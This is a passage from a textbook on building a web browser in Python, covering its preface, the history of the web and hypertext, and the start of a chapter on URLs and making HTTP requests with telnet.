A computer science degree traditionally includes courses in operating systems, compilers, and databases in order to replace mystery with code. These courses transform Linux, Postgres, and LLVM into improvements, additions, and optimizations to an understandable core architecture. The lesson transcends the specific system studied: all computer systems, no matter how big and seemingly complex, can be studied and understood. (There are other reasons for these classes: a focus on speed; learning low-level APIs; practice with C; knowing the stack; using systems better; and the importance of the system covered.)
But web browsers are still opaque, not just to students but to faculty and industry programmers. This book dispels that mystery by systematically explaining all major components of a web browser.
Parts 1–3 of this book construct a basic browser weighing in at around 1,000 lines of code, twice that with the exercises. The average chapter takes 4–6 hours to read, implement, and debug for someone with a few years’ programming experience. Part 4 of this book covers advanced topics; those chapters are longer and have more code.
Your web browser will “work” every step of the way, and every chapter will build upon the last. (This idea is from J.R. Wilcox, inspired in turn by S. Zdancewic’s course on compilers.) That way, you will also practice growing and improving complex software. If you feel particularly interested in some component, please do flesh it out, complete the exercises, and add missing features. We’ve tried to arrange it so that this doesn’t make later chapters more difficult.
The code in this book uses Python 3, and we recommend you follow along in the same. When the book shows Python command lines, it calls the Python binary python3. (A few operating systems use python, but on most that means Python 2.) That said, the text avoids dependencies where possible and you can try to follow along in another language. Make sure your language has libraries for TLS connections (Python has one built in), graphics (the text uses Tk), and JavaScript evaluation (the text uses DukPy).
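If you want a quick sanity check of your environment before starting, a small script along these lines will report what is available. (This is just an illustration: ssl and tkinter ship with most Python 3 distributions, while dukpy is a third-party package you would install separately, for example with python3 -m pip install dukpy.)

```python
# Report which of the libraries this Python install provides:
# ssl for TLS connections, tkinter for graphics, dukpy for JavaScript.
import sys

assert sys.version_info >= (3, 0), "this book's code requires Python 3"

status = {}
for module in ["ssl", "tkinter", "dukpy"]:
    try:
        __import__(module)
        status[module] = "available"
    except ImportError:
        status[module] = "missing"

print(status)
```

If anything shows up as missing, it is worth installing it before starting the corresponding chapters.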
This book’s browser is irreverent toward standards: it handles only a sliver of the full HTML, CSS, and JavaScript languages, mishandles errors, and isn’t resilient to malicious inputs. It is also quite slow. Despite that, its architecture matches that of real browsers, providing insight into those ten-million-line behemoths.
That said, we’ve tried to explicitly note when the book’s browser simplifies or diverges from standards. And in general, when you’re not sure how your browser should behave in some edge case, fire up your favorite web browser and try it out.
We’d like to recognize the countless people who built the web and the various web browsers. They are wonders of the modern world. Thank you! We learned a lot from the books and articles listed in this book’s bibliography—thank you to their authors. And we’re especially grateful to the many contributors to articles on Wikipedia (especially those on historic software, formats, and protocols). We are grateful for this amazing resource, one which in turn was made possible by the very thing this book is about.
Pavel: James R. Wilcox and I dreamed up this course during a late-night chat at ICFP 2018. Max Willsey proof-read and helped sequence the chapters. Zach Tatlock encouraged me to develop the book into a course. And the students of CS 6968 and CS 4962 at the University of Utah found countless errors and suggested important simplifications. I am thankful to all of them. Most of all, I am thankful to my wife Sara, who supported my writing the book, listened to countless status updates, and gave me the strength to finish this many-year-long project.
Chris: I am eternally grateful to my wife Sara for patiently listening to my endless musings about the web, and encouraging me to turn my idea for a browser book into reality. I am also grateful to Dan Gildea for providing feedback on my browser-book concept on multiple occasions. Finally, I’m grateful to Pavel for doing the hard work getting this project off the ground and allowing me to join the adventure. (Turns out Pavel and I had the same idea!)
This book is, and will remain, a work in progress. Please leave comments and mark typos; the book has built-in feedback tools, which you can enable with Ctrl-E (or Cmd-E on a Mac). The full source code is also available on GitHub, though we prefer to receive comments through the built-in tools.
Why study web browsers? The way I see it, browsers are fundamental to the web, to modern computing, and even to the economy broadly—so it’s worth knowing how they work. And in fact, cool algorithms, tricky data structures, and fundamental concepts come alive inside a web browser. This book walks you through building a browser, from scratch. I hope, as you read it, that you fall in love with web browsers, just like I did.
I—this is Chris speaking—have known the web for all of my adult life. (Broadly defined, the web is the interlinked network, a “web”, of web pages on the internet. If you’ve never made a web page, I recommend MDN’s Learn Web Development series, especially the Getting Started guide. This book will be easier to read if you’re familiar with the core technologies.) Since I first encountered the web and its predecessors in the early 90s (for me, BBS systems over a dial-up modem connection; a BBS is not all that different from a browser if you think of it as a window into dynamic content created somewhere else on the internet), I’ve been fascinated by browsers and the concept of networked user interfaces. When I surfed the web, even in its earliest form, I felt I was seeing the future of computing. In some ways, the web and I grew together: 1994, the year the web went commercial, was the same year I started college; while there I spent a fair amount of time surfing it, and by the time I graduated in 1999, the browser had fueled the famous dot-com speculation gold rush. The company for which I now work, Google, is a child of the web and was founded during that time. The web for me is something of a technological companion, and I’ve never been far from it in my studies or work.
In my freshman year at college, I attended a presentation by a RedHat salesman. The presentation was of course aimed at selling RedHat Linux, probably calling it the “operating system of the future” and speculating about the “year of the Linux desktop”. But when asked about challenges RedHat faced, the salesman mentioned not Linux but the web: he said that someone “needs to make a good browser for Linux.” (Netscape Navigator was available for Linux at that time, but it wasn’t viewed as especially fast or featureful compared to its implementation on other operating systems.) Even back then, in the very first year or so of the web, the browser was already a necessary component of every computer. He even threw out a challenge: “how hard could it be to build a better browser?” Indeed, how hard could it be? What makes it so hard? That question stuck with me for a long time. (Meanwhile, the “better Linux browser than Netscape” took a long time to appear….)
How hard indeed! After seven years in the trenches working on Chrome, I now know the answer to his question: building a browser is both easy and incredibly hard, both intentional and accidental. And everywhere you look, you see the evolution and history of the web wrapped up in one codebase. But most of all, it’s fun and endlessly interesting.
So that’s how I fell in love with web browsers. Now let me tell you why you will, too.
The web is a grand, crazy experiment. It’s natural, nowadays, to watch videos, read news, and connect with friends on the web. That can make the web seem simple and obvious, finished, already built. But the web is neither simple nor obvious. It is the result of experiments and research, reaching back to nearly the beginning of computing, about how to help people connect and learn from each other. (The web also needed rich computer displays, powerful UI-building libraries, fast networks, and sufficient CPU power and information storage capacity. As so often happens with technology, the web had many similar predecessors, but only took its modern form once all the pieces came together.)
In the early days, the internet was a world wide network of computers, largely at universities, labs, and major corporations, linked by physical cables and communicating over application-specific protocols. The early web built on this foundation. Web pages were files in a specific format stored on specific computers, and web browsers used a custom protocol to request them. URLs for web pages named the computer and the file, and early servers did little besides read files from a disk. The logical structure of the web mirrored its physical structure.
A lot has changed. HTML is now usually dynamically assembled on the fly and sent on demand to your browser. (“Server-side rendering” is the process of assembling HTML on the server when loading a web page. Server-side rendering often uses web tech like JavaScript, and even a headless browser. Yet one more place browsers are taking over!) The pieces being assembled are themselves filled with dynamic content—news, inbox contents, and advertisements adjusted to your particular tastes. Even URLs no longer identify a specific computer—content distribution networks route a URL to any of thousands of computers all around the world. At a higher level, most web pages are served not from someone’s home computer but from a social media platform or cloud computing service. (People actually did serve web pages from home computers! And when their website became popular, it often ran out of bandwidth or computing power and became inaccessible.)
With all that’s changed, some things have stayed the same: the core building blocks that are the essence of the web.
As a philosophical matter, perhaps one or another of these principles is secondary. One could try to distinguish between the networking and rendering aspects of the web. One could abstract linking and networking from the particular choice of protocol and data format. One could ask whether the browser is necessary in theory, or argue that HTTP, URLs, and hyperlinking are the only truly essential parts of the web.
Perhaps. (It is indeed true that one or more of the implementation choices could be replaced, and perhaps that will happen over time. For example, JavaScript might eventually be replaced by another language or technology, HTTP by some other protocol, or HTML by its successor. Certainly all of these technologies have been through many versions, but the web has stayed the web.) The web is, after all, an experiment; the core technologies evolve and grow. But the web is not an accident; its original design reflects truths not just about computing, but about how human beings can connect and interact. The web not only survived but thrived during the virtualization of hosting and content, specifically due to the elegance and effectiveness of this original design.
The key thing to understand is that this grand experiment is not over. The essence of the web will stay, but by studying web browsers you have the chance to contribute and to shape its future.
So let me tell you what it’s like to contribute. Some time during my first few months of working on Chrome, I came across the code implementing the <br> tag—look at that, the good old <br> tag, which I’ve used many times to insert newlines into web pages! And the implementation turns out to be barely any code at all, both in Chrome and in this book’s simple browser.
But Chrome as a whole—its features, speed, security, reliability—wow. Thousands of person-years went into it. There is a constant pressure to do more—to add more features, to improve performance, to keep up with the “web ecosystem”—for the thousands of businesses, millions of developers, and billions of users on the web. (I usually prefer “engineer”—hence the title of this book—but “developer” or “web developer” is much more common on the web. One important reason is that anyone can build a web page, not just trained software engineers and computer scientists. “Web developer” is also more inclusive of additional, critical roles like designers, authors, editors, and photographers. A web developer is anyone who makes web pages, regardless of how.)
Working on such a codebase can feel daunting. I often find lines of code last touched 15 years ago by someone I’ve never met; or even now discover files and code that I never knew existed; or see lines of code that don’t look necessary, yet seem to be important. How do I understand that 15-year-old code? Or learn the purpose of these new files? Can I delete those lines of code, or are they there for a reason?
Every browser has thousands of unfixed bugs, from the smallest of mistakes to myriad mix-ups and mismatches. Every browser must be endlessly tuned and optimized to squeeze out that last bit of performance. Every browser requires painstaking work to continuously refactor the code to reduce its complexity, often through the careful introduction of modularization and abstraction. (Browsers are so performance-sensitive that, in many places, merely introducing an abstraction, with its function call or branching overhead, has an unacceptable performance cost!)
What makes browsers different from most massive codebases is their urgency. Browsers are nearly as old as any “legacy” codebase, but they are not legacy, not abandoned or half-deprecated, not slated for replacement. On the contrary, they are vital to the world’s economy. Browser engineers must therefore fix and improve rather than abandon and replace. And since the character of the web itself is highly decentralized, the use cases met by browsers are to a significant extent not determined by the companies “owning” or “controlling” a particular browser. Other people—you—can contribute ideas, proposals, and implementations.
What’s amazing is that, despite the scale and the pace and the complexity, there is still plenty of room to contribute. Every browser today is open-source, which opens up its implementation to the whole community of web developers. Browsers evolve like giant R&D projects, where new ideas are constantly being proposed and tested out. As you would expect, some features fail and some succeed. The ones that succeed end up in specifications and are implemented by other browsers. That means that every web browser is open to contributions—whether fixing bugs or proposing new features or implementing promising optimizations.
And it’s worth contributing, because working on web browsers is a lot of fun.
HTML, CSS, HTTP, hyperlinks, and JavaScript—the core of the web—are approachable enough, and if you’ve made a web page before you’ve seen that programming ability is not required. That’s because HTML and CSS are meant to be black boxes—declarative APIs—where one specifies what outcome to achieve, and the browser itself is responsible for figuring out how to achieve it. Web developers don’t, and mostly can’t, draw their web page’s pixels on their own.
As a black box, the browser is either magical or frustrating (depending on whether it is working correctly or not!). But that also makes a browser a pretty unusual piece of software, with unique challenges, interesting algorithms, and clever optimizations. Browsers are worth studying for the pure pleasure of it.
There are practical reasons for the unusual design of a browser. Yes, developers lose some control and agency—when pixels are wrong, developers cannot fix them directly. (Loss of control is not necessarily specific to the web—much of computing these days relies on mountains of other peoples’ code.) But they gain the ability to deploy content on the web without worrying about the details, to make that content instantly available on almost every computing device in existence, and to keep it accessible in the future, mostly avoiding the inevitable obsolescence of most software.
What makes that all work is the web browser’s implementation of inversion of control, constraint programming, and declarative programming. The web inverts control, with an intermediary—the browser—handling most of the rendering, and the web developer specifying parameters and content to this intermediary. (For example, HTML has many built-in form control elements that take care of the various ways the user of a web page can provide input. The developer need only specify parameters such as button names, sizing, and look-and-feel, or JavaScript extension points to handle form submission to the server. The rest of the implementation is taken care of by the browser.) Further, these parameters usually take the form of constraints over relative sizes and positions instead of specifying their values directly; the browser solves the constraints to find those values. (Constraint programming is clearest during web page layout, where font and window sizes, desired positions and sizes, and the relative arrangement of widgets are rarely specified directly. A fun question to consider: what does the browser “optimize for” when computing a layout?) The same idea applies to actions: web pages mostly require that actions take place without specifying when they do. This declarative style means that from the point of view of a developer, changes “apply immediately”, but under the hood, the browser can be lazy and delay applying the changes until they become externally visible, either due to subsequent API calls or because the page has to be displayed to the user. (For example, when exactly does the browser compute which CSS styles apply to which HTML elements, after a web page changes those styles? The change is visible to all subsequent API calls, so in that sense it applies “immediately”. But it is better for the browser to delay style recalculation, avoiding redundant work if styles change twice in quick succession.)
Maximally exploiting the opportunities afforded by declarative programming makes real-world browsers very complex.
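As a concrete, much simplified sketch of that lazy, declarative behavior (this is illustrative Python, not real browser code, and the Element class here is entirely made up), browsers commonly use a “dirty flag”: a style change is recorded immediately, but the expensive recomputation is deferred until someone actually needs the result.

```python
# A toy sketch of lazy style recalculation using a dirty flag.
# Real browsers use far more granular invalidation than this.
class Element:
    def __init__(self):
        self._declared = {}   # styles the page has set
        self._computed = {}   # cached computed styles
        self._dirty = True    # does the cache need recomputing?

    def set_style(self, prop, value):
        # "Applies immediately" from the page's point of view...
        self._declared[prop] = value
        self._dirty = True    # ...but we only mark, not recompute.

    def computed_style(self):
        # Recompute lazily, only when someone actually asks.
        if self._dirty:
            # A stand-in for the real cascade-and-inherit computation.
            self._computed = dict(self._declared)
            self._dirty = False
        return self._computed

el = Element()
el.set_style("color", "red")
el.set_style("color", "blue")   # two changes, but only one recompute below
print(el.computed_style()["color"])
```

Note that the two style changes trigger only a single recomputation, which is exactly the redundant work the lazy approach avoids.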
To me, browsers are where algorithms come to life. A browser contains a rendering engine more complex and powerful than any computer game; a full networking stack; clever data structures and parallel programming techniques; a virtual machine, an interpreted language, and a JIT; a world-class security sandbox; and a uniquely dynamic system for storing data.
And the truth is—you use the browser all the time, maybe for reading this book! That makes the algorithms more approachable in a browser than almost anywhere else: the web is already familiar. After all, it’s at the center of modern computing.
Every year the web expands its reach to more and more of what we do with computers. It now goes far beyond its original use for document-based information sharing: many people now spend their entire day in a browser, not using a single other application! Moreover, desktop applications are now often built and delivered as web apps: web pages loaded by a browser but used like installed applications. (Related to the notion of a web app is a Progressive Web App, a web app that becomes indistinguishable from a native app through progressive enhancement.) Even on mobile devices, apps often embed a browser to render parts of the application UI. (The fraction of such “hybrid” apps that are shown via a “web view” is likely increasing over time. In some markets like China, “super-apps” act like a mobile web browser for web-view-based games and widgets.) Perhaps in the future both desktop and mobile devices will largely be a container for web apps. Already, browsers are a critical and indispensable part of computing.
So given this centrality, it’s worth knowing how the web works. And in fact, the web is built on simple concepts: open, decentralized, and safe computing; a declarative document model for describing UIs; hyperlinks; and the User Agent model. (The User Agent concept views a computer, or software within the computer, as a trusted assistant and advocate of the human user.) It’s the browser that makes these concepts real. The browser is the User Agent, but also the mediator of the web’s interactions and the enforcer of its rules. The browser is the implementer of the web: its sandbox keeps web browsing safe; its algorithms implement the declarative document model; its UI navigates links. Web pages load fast and react smoothly only when the browser is hyper-efficient.
Such lofty goals! How does the browser deliver on them? It’s worth knowing. And the best way to answer that question is to build a web browser.
This book explains how to build a simple browser, one that can—despite its simplicity—display interesting-looking web pages and support many interesting behaviors. (You might relate this to the history of the web and the idea of progressive enhancement.) As you’ll see, it’s surprisingly easy, and it demonstrates all the core concepts you need to understand a real-world browser. You’ll see what is easy and what is hard; which algorithms are simple, and which are tricky; what makes a browser fast, and what makes it slow.
The intention is for you to build your own browser as you work through the early chapters. Once it is up and running, there are endless opportunities to improve performance or add features. Many of these exercises are features implemented in real browsers, and I encourage you to try them—adding features is one of the best parts of browser development!
The book then moves on to details and advanced features that flesh out the architecture of a real browser’s rendering engine, based on my experiences with Chrome. After finishing the book, you should be able to dig into the source code of Chromium, Gecko, or WebKit, and understand it without too much trouble.
I hope the book lets you appreciate a browser’s depth, complexity, and power. I hope the book passes along its beauty—its clever algorithms and data structures, its co-evolution with the culture and history of computing, its centrality in our world. But most of all, I hope the book lets you see in yourself someone building the browser of the future.
If you’ve read this far, hopefully you’re convinced that browsers are interesting and important to study. Now we’ll dig a bit into the web itself: where it came from, and how the web and browsers have evolved to date. This history is by no means exhaustive. (For example, there is nothing much about SGML or other predecessors to HTML. Except in this footnote!) Instead, it’ll focus on some key events and ideas that led to the web. These ideas and events will explain how exactly a thing such as the web came to be, as well as the motivations and goals of those who created it and its predecessors.
The earliest exploration of how computers might revolutionize information is a 1945 essay by Vannevar Bush entitled As We May Think. This essay envisioned a machine called a Memex (think: User Agent) that helps an individual human see and explore all the information in the world. It was described in terms of the microfilm screen technology of the time, but its purpose and concept have some clear similarities to the web as we know it today, even if the user interface and technology details differ.
The web is at its core organized around the Memex-like goal of representing and displaying information, providing a way for humans to effectively learn and explore. The collective knowledge and wisdom of the species long ago exceeded the capacity of a single mind, organization, library, country, culture, group, or language. However, while we as humans cannot possibly know even a tiny fraction of what it is possible to know, we can use technology to learn more efficiently than before, and, in particular, to quickly access information we need to learn, remember, or recall. Consider this imagined research session described by Vannevar Bush, one that is remarkably similar to how we sometimes use the web:
The owner of the memex, let us say, is interested in the origin and properties of the bow and arrow. […] He has dozens of possibly pertinent books and articles in his memex. First he runs through an encyclopedia, finds an interesting but sketchy article, leaves it projected. Next, in a history, he finds another pertinent item, and ties the two together. Thus he goes, building a trail of many items.
Computers, and the internet, allow us to process and store the information we want. But it is the web that helps us organize and find that information, that knowledge, making it useful. (The Google search engine’s well-known mission statement, to “organize the world’s information and make it universally accessible and useful”, is almost exactly the same. This is not a coincidence—the search engine concept is inherently connected to the web, and was inspired by the web’s design and antecedents.)
As We May Think highlighted two features of the memex: information record lookup, and associations between related records. In fact, the essay emphasizes the importance of the latter—we learn by making previously unknown connections between known things:
When data of any sort are placed in storage, they are filed alphabetically or numerically. […] The human mind does not work that way. It operates by association.
By “association”, Bush meant a trail of thought leading from one record to the next via a human-curated link. He imagined not just a universal library, but a universal way to record the results of what we learn. That is what the web can do today.
The concept of hypertext documents linked by hyperlinks was invented in 1964–65 by Project Xanadu, led by Ted Nelson. (He was inspired by the long tradition of citation and criticism in academic and literary communities; the Project Xanadu research papers were heavily motivated by this use case.) A successor called the Hypertext Editing System was the first to introduce the back button, which all browsers now have. (Since the system just had text, the “button” was itself text.)
Hypertext is text that is marked up with hyperlinks to other text. Sounds familiar? A web page is hypertext, and links between web pages are hyperlinks. The format for writing web pages is HTML, short for HyperText Markup Language. The protocol for loading web pages is HTTP, short for HyperText Transfer Protocol.
Independently of Project Xanadu, the first hyperlink system appeared for scrolling within a single document; it was later generalized to linking between multiple documents. And just like those original systems, the web has linking within documents as well as between them. For example, the URL “http://example.com/doc.html#link” refers to a document called “doc.html”, and specifically to the element with the name “link” within it. Clicking on a link to that URL will load doc.html and scroll to the link element.
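You can see this document-plus-fragment structure programmatically with Python’s standard library. (A quick illustration, separate from the book’s browser code.)

```python
# Split a URL into its document part and its within-document fragment.
from urllib.parse import urlparse

url = "http://example.com/doc.html#link"
parts = urlparse(url)

print(parts.netloc)    # example.com -- which computer
print(parts.path)      # /doc.html   -- which document
print(parts.fragment)  # link        -- which element to scroll to
```

Note that the fragment is separated out by the parser rather than sent to the server: the browser requests /doc.html and then handles the scroll to “link” itself.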
This work also formed and inspired one of the key parts of Douglas Engelbart’s mother of all demos, perhaps the most influential technology demonstration in the history of computing. That demo not only showcased the key concepts of the web, but also introduced the computer mouse and graphical user interface, both of which are of course central components of a browser UI. (The demo went beyond even this! There are some parts of it that have not yet been realized in any computer system. I highly recommend watching the demo yourself.)
There is of course a very direct connection between this research and the document-URL-hyperlink setup of the web, which built on the hypertext idea and applied it in practice. The HyperTIES system, for example, had highlighted hyperlinks and was used to develop the world’s first electronically published academic journal, the 1988 issue of the Communications of the ACM. Tim Berners-Lee cites that 1988 issue as inspiration for the World Wide Web. (Nowadays the World Wide Web is called just “the web”, or “the web ecosystem”, ecosystem being another way to capture the same concept as “World Wide”. The original wording lives on in the “www” in many website domain names.) In the World Wide Web, he joined the link concept with the availability of the internet, thus realizing many of the original goals of all this work from previous decades. (Just as the web itself is a realization of previous ambitions and dreams, today we strive to realize the vision laid out by the web. No, it’s not done yet!)
The word “hyperlink” may have been coined in 1987, in connection with the HyperCard system on Apple computers. This system was also one of the first, or perhaps the first, to introduce the concept of augmenting hypertext with scripts that handle user events like clicks and perform actions that enhance the UI, just like JavaScript on a web page! It also had graphical UI elements, not just text, unlike most predecessors.
In 1989-1990, the first web browser (named “WorldWideWeb”) and web server (named “httpd”, for “HTTP Daemon” according to UNIX naming conventions) were born, written by Tim Berners-Lee. Interestingly, while that browser’s capabilities were in some ways inferior to the browser you will implement in this book (no CSS!), in other ways they go beyond the capabilities available even in modern browsers. (For example, the first browser included the concept of an index page meant for searching within a site; vestiges of this exist today in the “index.html” convention when a URL path ends in “/”. It also had a WYSIWYG web page editor; the “contenteditable” HTML attribute and “html()” method on DOM elements have similar semantic behavior, but built-in file saving is gone. Today, the index is replaced with a search engine, and web page editors as a concept are somewhat obsolete due to the highly dynamic nature of today’s web page rendering.) On December 20, 1990, the first web page was created. The browser we will implement in this book is easily able to render this web page, even today. (As you can see, that web page has not been updated in the meantime, and retains its original aesthetics!) In 1991, Berners-Lee advertised his browser and the concept on the alt.hypertext Usenet group.
Berners-Lee’s Brief History of the Web highlights a number of other key factors that led to the World Wide Web becoming the web we know today. One key factor was its decentralized nature, which he describes as arising from the academic culture of CERN, where he worked. The decentralized nature of the web is a key feature that distinguishes it from many systems that came before or after, and his explanation of it is worth quoting here (highlight is mine):
There was clearly a need for something like Enquire [ed: a predecessor web-like database system, also written by Berners-Lee] but accessible to everyone. I wanted it to scale so that if two people started to use it independently, and later started to work together, they could start linking together their information without making any other changes. This was the concept of the web.
This quote captures one of the key value propositions of the web. The web was successful for several reasons, but I believe it’s primarily the following three:
It provides a very low-friction way to publish information and applications. There is no gatekeeper to doing anything, and it’s easy for novices to make a simple web page and publish it.
Once bootstrapped, it builds quickly upon itself via network effects made possible by compatibility between sites and the power of the hyperlink to reinforce this compatibility. Hyperlinks drive traffic between sites, but also into the web from the outside, from sources such as email, social networking, and search engines.
It is outside the control of any one entity—and kept that way via standards organizations—and therefore not subject to problems of monopoly control or manipulation.
The first widely distributed browser may have been ViolaWWW; this browser also pioneered multiple interesting features such as applets and images. It was in turn the inspiration for NCSA Mosaic, which launched in 1993. One of the two original authors of Mosaic went on to co-found Netscape, which built Netscape Navigator, the first commercial browser, launched in 1994. (By “commercial” I mean built by a for-profit entity. Netscape’s early versions were also not free software; you had to buy them from a store, for about $50.)
The era of the “first browser war” ensued: a competition between Netscape Navigator and Internet Explorer. There were also other browsers with smaller market shares; one notable example is Opera. The WebKit project began in 1999; Safari and Chromium-based browsers, such as Chrome and newer versions of Edge, descend from this codebase. Likewise, the Gecko rendering engine was originally developed by Netscape starting in 1997; the Firefox browser is descended from this codebase. During the first browser war, nearly all of the core features of this book’s simple browser were added, including CSS, DOM, and JavaScript.
The “second browser war”, which according to Wikipedia was 2004-2017, was fought between a variety of browsers, in particular Internet Explorer, Firefox, Safari and Chrome. Chrome split off its rendering engine subsystem into its own code base called Blink in 2013. The second browser war saw the development of many features of the modern web, including widespread use of AJAX requests, HTML5 features like <canvas>, and a huge explosion in third-party JavaScript libraries and frameworks.
In parallel with these developments was another, equally important, one—the standardization of web APIs. In October 1994, the World Wide Web Consortium (W3C) was founded to provide oversight and standards for web features. Prior to this point, browsers would often introduce new HTML elements or APIs, and competing browsers would have to copy them. With a standards organization, those elements and APIs could subsequently be agreed upon and documented in specifications. (These days, an initial discussion, design and specification precedes any new feature.) Later on, the HTML specification ended up moving to a different standards body called the WHATWG, but CSS and other features are still standardized at the W3C. JavaScript is standardized at TC39 (“Technical Committee 39” at ECMA, yet another standards body). HTTP is standardized by the IETF. The point is that the standards process set up in the mid-nineties is still with us.
In the first years of the web, it was not so clear that browsers would remain standard and that one browser might not end up “winning” and becoming another proprietary software platform. There are multiple reasons this didn’t happen, among them the egalitarian ethos of the computing community and the presence and strength of the W3C. Another important reason was the networked nature of the web, and therefore the necessity for web developers to make sure their pages worked correctly in most or all of the browsers (otherwise they would lose customers), leading them to avoid proprietary extensions. On the contrary—browsers worked hard to carefully reproduce each other’s undocumented behaviors—even bugs—to make sure they continued supporting the whole web.
There never really was a point where any browser openly attempted to break away from the standard, despite fears that that might happen.Perhaps the closest the web came to fragmenting was with the late-90s introduction of features for DHTML—early versions of the Document Object Model you’ll learn about in this book. Netscape and Internet Explorer at first had incompatible implementations of these features, and it took years, development of a common specification, and significant pressure campaigns on the browsers before standardization was achieved. You can read about this story in much more depth here. Instead, intense competition for market share was channeled into very fast innovation and an ever-expanding set of APIs and capabilities for the web, which we nowadays refer to as the web platform, not just the “World Wide Web”. This recognizes the fact that the web is no longer a document viewing mechanism, but has evolved into a fully realized computing platform and ecosystem.There have even been operating systems built around the web! Examples include webOS, which powered some Palm smartphones, Firefox OS (that today lives on in KaiOS-based phones), and ChromeOS, which is a desktop operating system. All of these OSes are based on using the Web as the UI layer for all applications, with some JavaScript-exposed APIs on top for system integration.
Given the outcomes—multiple competing browsers and well-developed standards—it is in retrospect not that relevant which browser “won” or “lost” each of the browser “wars”. In both cases the web won and was preserved and enhanced for the future.
Another important and interesting outcome of the second browser war was that all mainstream browsers today (of which there are many more than threeExamples of Chromium-based browsers include Chrome, Edge, Opera (which switched to Chromium from the Presto engine in 2013), Samsung Internet, Yandex Browser, UC Browser and Brave. In addition, there are many “embedded” browsers, based on one or another of the three engines, for a wide variety of automobiles, phones, TVs and other electronic devices.) are based on three open-source web rendering / JavaScript engines: Chromium, Gecko and WebKit.The JavaScript engines are actually in different repositories (as are various other sub-components that we won’t get into here), and can and do get used outside the browser as JavaScript virtual machines. One important application is the use of v8 to power node.js. However, each of the three rendering engines does have a corresponding JavaScript implementation, so conflating the two is reasonable. Since Chromium and WebKit have a common ancestral codebase, while Gecko is an open-source descendant of Netscape, all three date back to the 1990s—almost to the beginning of the web.
This is not an accident, and in fact tells us something quite interesting about the most cost-effective way to implement a rendering engine based on a commodity set of platform APIs. For example, it’s common for a wide variety of independent developers (ones not paid by the company nominally controlling the browser) to contribute code and features. There are even companies and individuals that specialize in implementing these features! And every major browser being open source feeds back into the standards process, reinforcing the web’s decentralized nature.
In summary, the history went like this:
Basic research was performed into the ways to represent and explore information.
Once the technology became mature enough, the web proper was proposed and implemented.
The web became popular quite quickly, and many browsers appeared in order to capitalize on the web’s opportunity.
Standards organizations were introduced in order to negotiate between the browsers and avoid proprietary control.
Browsers continued to compete and evolve at a rapid pace; that pace has overall not slowed in the years since.
Browsers appeared on all devices and operating systems, including all desktop and mobile devices & OSes, as well as embedded devices such as televisions, watches and kiosks.
The web continued to grow in power and complexity, even going beyond the original conception of a web browser.
Eventually, all web rendering engines became open source, as a recognition of their being a shared effort larger than any single entity.
The web has come a long way! It’ll be interesting to see where it goes in the future.
But one thing seems clear: it isn’t done yet.
What comes next: Based on what you learned about how the web came about and took its current form, what trends do you predict for its future evolution? For example, do you think it’ll compete effectively against other non-web technologies and platforms?
What became of the original ideas? The way the web works in practice is significantly different than the memex; one key difference is that there is no built-in way for the user of the web to add links between pages or notate them. Why do you think this is? Can you think of other goals from the original work that remain unrealized?
A web browser displays information identified by a URL. And the first step is to use that URL to connect to and download that information from a server somewhere on the Internet.
Browsing the internet starts with a URL,“URL” stands for “Uniform Resource Locator”, meaning that it is a portable (uniform) way to identify web pages (resources) and also that it describes how to access those files (locator). a short string that identifies a particular web page that the browser should visit. A URL looks like this:
http://example.org/index.html
This URL has three parts: the scheme explains how to get the information; the host explains where to get it; and the path explains what information to get. There are also optional parts to the URL, like ports, queries, and fragments, which we’ll see later.
From a URL, the browser can start the process of downloading the web
page. The browser first asks the OS to put it in touch with the
server described by the host name. The OS then talks
to a DNS server which convertsOn some systems, you can run
dig +short example.org
to do this conversion
yourself. a host name like example.org
into a
destination IP address like 93.184.216.34
.Today there are two versions
of IP: IPv4 and IPv6. IPv6 addresses are a lot longer and are usually in
hex, but otherwise the differences don’t matter here. Then
the OS decides which hardware is best for communicating with that
destination IP address (say, wireless or wired) using what is called a
routing table, and then uses device drivers to send signals
over a wire or over the air.I’m skipping steps here. On wires you first have to wrap
communications in ethernet frames, on wireless you have to do even more.
I’m trying to be brief. Those signals are picked up and
transmitted by a series of routersOr a switch, or an access
point, there are a lot of possibilities, but eventually there is a
router. which each choose the best direction to send your
message so that it eventually gets to the destination.They may also record where the
message came from so they can forward the reply back, especially in the
case of NATs. When the message reaches the server, a
connection is created. Anyway, the point of this is that the browser
tells the OS, “Hey, put me in touch with example.org
”, and
it does.
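As an aside, if you want to see the difference between the two kinds of IP addresses mentioned in the sidenote, Python’s standard ipaddress module can parse both. (This isn’t part of our browser; it’s just a quick way to poke at addresses. The IPv6 address below is simply an example of the format, not necessarily any particular host’s address.)

```python
import ipaddress

# The example IPv4 address from the text: four decimal numbers.
v4 = ipaddress.ip_address("93.184.216.34")
print(v4.version)  # 4

# An IPv6 address: eight groups of hex digits, much longer.
v6 = ipaddress.ip_address("2606:2800:220:1:248:1893:25c8:1946")
print(v6.version)  # 6
```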
On many systems, you can set up this kind of connection using the
telnet
program, like this:The “80” is the port,
discussed below.
telnet example.org 80
You might need to install telnet
; it is often disabled
by default. On Windows, go to Programs
and Features / Turn Windows features on or off in the Control panel;
you’ll need to reboot. When you run it, it’ll clear the screen instead
of printing something, but other than that works normally. On macOS, you
can use the nc -v
command as a replacement for
telnet
:
nc -v example.org 80
The output is a little different but it works in the same way. On
most Linux systems, you can install telnet
from the package
manager; plus, the nc
command is usually available from a
package called netcat
.
You’ll get output that looks like this:
Trying 93.184.216.34...
Connected to example.org.
Escape character is '^]'.
This means that the OS converted the host name
example.org
into the IP address 93.184.216.34
and was able to connect to it.The line about escape characters is just instructions on
using obscure telnet
features. You can now
talk to example.org
.
The syntax of URLs is defined in RFC 3986, which is pretty readable. Try to implement the full URL standard, including encodings for reserved characters.
Once it’s connected, the browser requests information from the server
by giving its path, the path being the part of a URL that comes
after the host name, like /index.html
. The request looks
like this; you should type it into telnet
:
GET /index.html HTTP/1.0
Host: example.org
Make sure to type a blank line after the Host
line.
Here, the word GET
means that the browser would like to
receive information,It
could say POST
if it intended to send information, plus
there are some other, more obscure options. then comes the
path, and finally there is the word HTTP/1.0
which tells
the host that the browser speaks version 1.0 of HTTP.Why not 1.1? You can use 1.1,
but then you need another header (Connection
) to handle a
feature called “keep-alive”. Using 1.0 avoids this
complexity. There are several versions of HTTP (0.9,
1.0, 1.1, and 2.0). The HTTP 1.1 standard adds a variety of useful
features, like keep-alive, but in the interest of simplicity our browser
won’t use them. We’re also not implementing HTTP 2.0; HTTP 2.0 is much
more complex than the 1.X series, and is intended for large and complex
web applications, which our browser can’t run anyway.
After the first line, each line contains a header, which has
a name (like Host
) and a value (like
example.org
). Different headers mean different things; the
Host
header, for example, tells the server who you think it
is.This is useful when
